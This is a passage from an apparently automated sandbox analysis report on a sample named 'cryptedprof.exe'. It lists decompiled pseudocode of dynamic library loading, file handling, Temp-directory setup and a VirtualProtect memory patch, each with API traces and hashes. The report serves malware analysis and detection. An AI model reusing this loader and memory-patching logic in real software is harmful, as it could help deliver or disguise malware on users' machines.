                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThread
                                                                                        • String ID:
                                                                                        • API String ID: 2411489757-0
                                                                                        • Opcode ID: e6c65b1ebc359eaacaabdb592bb0af93d2cdddc828e0198a0abb3b7374f1df7b
                                                                                        • Instruction ID: 35e0d667786c4a0af5142887ccbb60df88795cf57bf78aa717b8ff7b1ed783d7
                                                                                        • Opcode Fuzzy Hash: e6c65b1ebc359eaacaabdb592bb0af93d2cdddc828e0198a0abb3b7374f1df7b
                                                                                        • Instruction Fuzzy Hash: 57320831D40208EEEB10CFA4DC56BEDB7B5FF04705F20449AE618FA2A0E7759A84CB15
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 60%
                                                                                        			E0040209D(void* __ebx, void* __eflags) {
                                                                                        				struct HINSTANCE__* _t18;
                                                                                        				struct HINSTANCE__* _t26;
                                                                                        				void* _t27;
                                                                                        				struct HINSTANCE__* _t30;
                                                                                        				CHAR* _t32;
                                                                                        				intOrPtr* _t33;
                                                                                        				void* _t34;
                                                                                        
                                                                                        				_t27 = __ebx;
                                                                                        				asm("sbb eax, 0x42f518");
                                                                                        				 *(_t34 - 4) = 1;
                                                                                        				if(__eflags < 0) {
                                                                                        					_push(0xffffffe7);
                                                                                        					L15:
                                                                                        					E00401423();
                                                                                        					L16:
                                                                                        					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t32 = E00402BCE(0xfffffff0);
                                                                                        				 *(_t34 + 8) = E00402BCE(1);
                                                                                        				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                        					L3:
                                                                                        					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                        					_t30 = _t18;
                                                                                        					if(_t30 == _t27) {
                                                                                        						_push(0xfffffff6);
                                                                                        						goto L15;
                                                                                        					}
                                                                                        					L4:
                                                                                        					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                        					if(_t33 == _t27) {
                                                                                        						E00405374(0xfffffff7,  *(_t34 + 8));
                                                                                        					} else {
                                                                                        						 *(_t34 - 4) = _t27;
                                                                                        						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                        							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
                                                                                        						} else {
                                                                                        							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                        							if( *_t33() != 0) {
                                                                                        								 *(_t34 - 4) = 1;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
                                                                                        						FreeLibrary(_t30);
                                                                                        					}
                                                                                        					goto L16;
                                                                                        				}
                                                                                        				_t26 = GetModuleHandleA(_t32); // executed
                                                                                        				_t30 = _t26;
                                                                                        				if(_t30 != __ebx) {
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				goto L3;
                                                                                        			}











                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2987980305-0
                                                                                        • Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                        • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                                        • Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
                                                                                        • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E004015BB(char __ebx, void* __eflags) {
                                                                                        				void* _t13;
                                                                                        				int _t19;
                                                                                        				char _t21;
                                                                                        				void* _t22;
                                                                                        				char _t23;
                                                                                        				signed char _t24;
                                                                                        				char _t26;
                                                                                        				CHAR* _t28;
                                                                                        				char* _t32;
                                                                                        				void* _t33;
                                                                                        
                                                                                        				_t26 = __ebx;
                                                                                        				_t28 = E00402BCE(0xfffffff0);
                                                                                        				_t13 = E00405C7E(_t28);
                                                                                        				_t30 = _t13;
                                                                                        				if(_t13 != __ebx) {
                                                                                        					do {
                                                                                        						_t32 = E00405C10(_t30, 0x5c);
                                                                                        						_t21 =  *_t32;
                                                                                        						 *_t32 = _t26;
                                                                                        						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                        						if(_t21 != _t26) {
                                                                                        							L5:
                                                                                        							_t22 = E004058B7(_t28);
                                                                                        						} else {
                                                                                        							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                        							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
                                                                                        								goto L5;
                                                                                        							} else {
                                                                                        								_t22 = E0040583A(_t28); // executed
                                                                                        							}
                                                                                        						}
                                                                                        						if(_t22 != _t26) {
                                                                                        							if(_t22 != 0xb7) {
                                                                                        								L9:
                                                                                        								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                        							} else {
                                                                                        								_t24 = GetFileAttributesA(_t28); // executed
                                                                                        								if((_t24 & 0x00000010) == 0) {
                                                                                        									goto L9;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                        						 *_t32 = _t23;
                                                                                        						_t30 = _t32 + 1;
                                                                                        					} while (_t23 != _t26);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                        					_push(0xfffffff5);
                                                                                        					E00401423();
                                                                                        				} else {
                                                                                        					E00401423(0xffffffe6);
                                                                                        					E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
                                                                                        					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                        					if(_t19 == 0) {
                                                                                        						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                        					}
                                                                                        				}
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
                                                                                        				return 0;
                                                                                        			}














                                                                                        APIs
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,747DFA90,?,747DF560,00405A35,?,747DFA90,747DF560,00000000), ref: 00405C8C
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                          • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 1892508949-1104044542
                                                                                        • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                        • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                        • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                        • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                        
                                                                                        				 *0x70994038 = _a4;
                                                                                        				if(_a8 == 1) {
                                                                                        					VirtualProtect(0x7099404c, 4, 0x40, 0x7099403c); // executed
                                                                                        					 *0x7099404c = 0xc2;
                                                                                        					 *0x7099403c = 0;
                                                                                        					 *0x70994044 = 0;
                                                                                        					 *0x70994058 = 0;
                                                                                        					 *0x70994048 = 0;
                                                                                        					 *0x70994040 = 0;
                                                                                        					 *0x70994050 = 0;
                                                                                        					 *0x7099404e = 0;
                                                                                        				}
                                                                                        				return 1;
                                                                                        			}




                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(7099404C,00000004,00000040,7099403C), ref: 7099293F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID: `gxt@Mxt
                                                                                        • API String ID: 544645111-1126417519
                                                                                        • Opcode ID: f54602752558335b86aa6433fbe4a89203ceaedddd31c938d4cc5700b4fb4453
                                                                                        • Instruction ID: 46aee05e8681868d0db4e2704c79bac87f9bb144acf9b02bb7838e39c1a93931
                                                                                        • Opcode Fuzzy Hash: f54602752558335b86aa6433fbe4a89203ceaedddd31c938d4cc5700b4fb4453
                                                                                        • Instruction Fuzzy Hash: 08F098B353C240DEC362CF6A8C55F153EE4A3D9258B21453BE758F6261E3B44444AF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 92%
                                                                                        			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                        				long _v8;
                                                                                        				long _t21;
                                                                                        				long _t22;
                                                                                        				void* _t24;
                                                                                        				long _t26;
                                                                                        				int _t27;
                                                                                        				long _t28;
                                                                                        				void* _t30;
                                                                                        				long _t31;
                                                                                        				long _t32;
                                                                                        				long _t36;
                                                                                        
                                                                                        				_t21 = _a4;
                                                                                        				if(_t21 >= 0) {
                                                                                        					_t32 = _t21 +  *0x42f4b8;
                                                                                        					 *0x429464 = _t32;
                                                                                        					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                        				}
                                                                                        				_t22 = E004032BF(4);
                                                                                        				if(_t22 >= 0) {
                                                                                        					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
                                                                                        					if(_t24 == 0) {
                                                                                        						L18:
                                                                                        						_push(0xfffffffd);
                                                                                        						goto L19;
                                                                                        					} else {
                                                                                        						 *0x429464 =  *0x429464 + 4;
                                                                                        						_t36 = E004032BF(_a4);
                                                                                        						if(_t36 < 0) {
                                                                                        							L21:
                                                                                        							_t22 = _t36;
                                                                                        						} else {
                                                                                        							if(_a12 != 0) {
                                                                                        								_t26 = _a4;
                                                                                        								if(_t26 >= _a16) {
                                                                                        									_t26 = _a16;
                                                                                        								}
                                                                                        								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                        								if(_t27 != 0) {
                                                                                        									_t36 = _v8;
                                                                                        									 *0x429464 =  *0x429464 + _t36;
                                                                                        									goto L21;
                                                                                        								} else {
                                                                                        									goto L18;
                                                                                        								}
                                                                                        							} else {
                                                                                        								if(_a4 <= 0) {
                                                                                        									goto L21;
                                                                                        								} else {
                                                                                        									while(1) {
                                                                                        										_t28 = _a4;
                                                                                        										if(_a4 >= 0x4000) {
                                                                                        											_t28 = 0x4000;
                                                                                        										}
                                                                                        										_v8 = _t28;
                                                                                        										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
                                                                                        											goto L18;
                                                                                        										}
                                                                                        										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
                                                                                        										if(_t30 == 0) {
                                                                                        											_push(0xfffffffe);
                                                                                        											L19:
                                                                                        											_pop(_t22);
                                                                                        										} else {
                                                                                        											_t31 = _v8;
                                                                                        											_a4 = _a4 - _t31;
                                                                                        											 *0x429464 =  *0x429464 + _t31;
                                                                                        											_t36 = _t36 + _t31;
                                                                                        											if(_a4 > 0) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L21;
                                                                                        											}
                                                                                        										}
                                                                                        										goto L22;
                                                                                        									}
                                                                                        									goto L18;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				L22:
                                                                                        				return _t22;
                                                                                        			}














                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                        • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                        • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                        • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00401389(signed int _a4) {
                                                                                        				intOrPtr* _t6;
                                                                                        				void* _t8;
                                                                                        				void* _t10;
                                                                                        				signed int _t11;
                                                                                        				void* _t12;
                                                                                        				signed int _t16;
                                                                                        				signed int _t17;
                                                                                        				void* _t18;
                                                                                        
                                                                                        				_t17 = _a4;
                                                                                        				while(_t17 >= 0) {
                                                                                        					_t6 = _t17 * 0x1c +  *0x42f490;
                                                                                        					if( *_t6 == 1) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_push(_t6); // executed
                                                                                        					_t8 = E00401434(); // executed
                                                                                        					if(_t8 == 0x7fffffff) {
                                                                                        						return 0x7fffffff;
                                                                                        					}
                                                                                        					_t10 = E0040136D(_t8);
                                                                                        					if(_t10 != 0) {
                                                                                        						_t11 = _t10 - 1;
                                                                                        						_t16 = _t17;
                                                                                        						_t17 = _t11;
                                                                                        						_t12 = _t11 - _t16;
                                                                                        					} else {
                                                                                        						_t12 = _t10 + 1;
                                                                                        						_t17 = _t17 + 1;
                                                                                        					}
                                                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                        						 *0x42ec2c =  *0x42ec2c + _t12;
                                                                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
                                                                                        					}
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}











                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                        • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                        • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                        • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00406656(signed int _a4) {
                                                                                        				struct HINSTANCE__* _t5;
                                                                                        				signed int _t10;
                                                                                        
                                                                                        				_t10 = _a4 << 3;
                                                                                        				_t8 =  *(_t10 + 0x40a258);
                                                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                        				if(_t5 != 0) {
                                                                                        					L2:
                                                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                        				}
                                                                                        				_t5 = E004065E8(_t8); // executed
                                                                                        				if(_t5 == 0) {
                                                                                        					return 0;
                                                                                        				}
                                                                                        				goto L2;
                                                                                        			}





                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                          • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                          • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                          • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                        • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                        • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                        • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 68%
                                                                                        			E00405DE6(CHAR* _a4, long _a8, long _a12) {
                                                                                        				signed int _t5;
                                                                                        				void* _t6;
                                                                                        
                                                                                        				_t5 = GetFileAttributesA(_a4); // executed
                                                                                        				asm("sbb ecx, ecx");
                                                                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                        				return _t6;
                                                                                        			}






                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405DC1(CHAR* _a4) {
                                                                                        				signed char _t3;
                                                                                        				signed char _t7;
                                                                                        
                                                                                        				_t3 = GetFileAttributesA(_a4); // executed
                                                                                        				_t7 = _t3;
                                                                                        				if(_t7 != 0xffffffff) {
                                                                                        					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                        				}
                                                                                        				return _t7;
                                                                                        			}






                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004058B7(CHAR* _a4) {
                                                                                        				int _t2;
                                                                                        
                                                                                        				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                        				if(_t2 == 0) {
                                                                                        					return GetLastError();
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}





                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E5E(void* _a4, void* _a8, long _a12) {
                                                                                        				int _t7;
                                                                                        				long _t11;
                                                                                        
                                                                                        				_t11 = _a12;
                                                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					return 1;
                                                                                        				}
                                                                                        			}






                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E8D(void* _a4, void* _a8, long _a12) {
                                                                                        				int _t7;
                                                                                        				long _t11;
                                                                                        
                                                                                        				_t11 = _a12;
                                                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					return 1;
                                                                                        				}
                                                                                        			}






                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041797F,00415460,004033BF,00415460,0041797F,NA,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040343E(long _a4) {
                                                                                        				long _t2;
                                                                                        
                                                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                        				return _t2;
                                                                                        			}





                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        C-Code - Quality: 96%
                                                                                        			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                        				struct HWND__* _v8;
                                                                                        				struct tagRECT _v24;
                                                                                        				void* _v32;
                                                                                        				signed int _v36;
                                                                                        				int _v40;
                                                                                        				int _v44;
                                                                                        				signed int _v48;
                                                                                        				int _v52;
                                                                                        				void* _v56;
                                                                                        				void* _v64;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				struct HWND__* _t87;
                                                                                        				struct HWND__* _t89;
                                                                                        				long _t90;
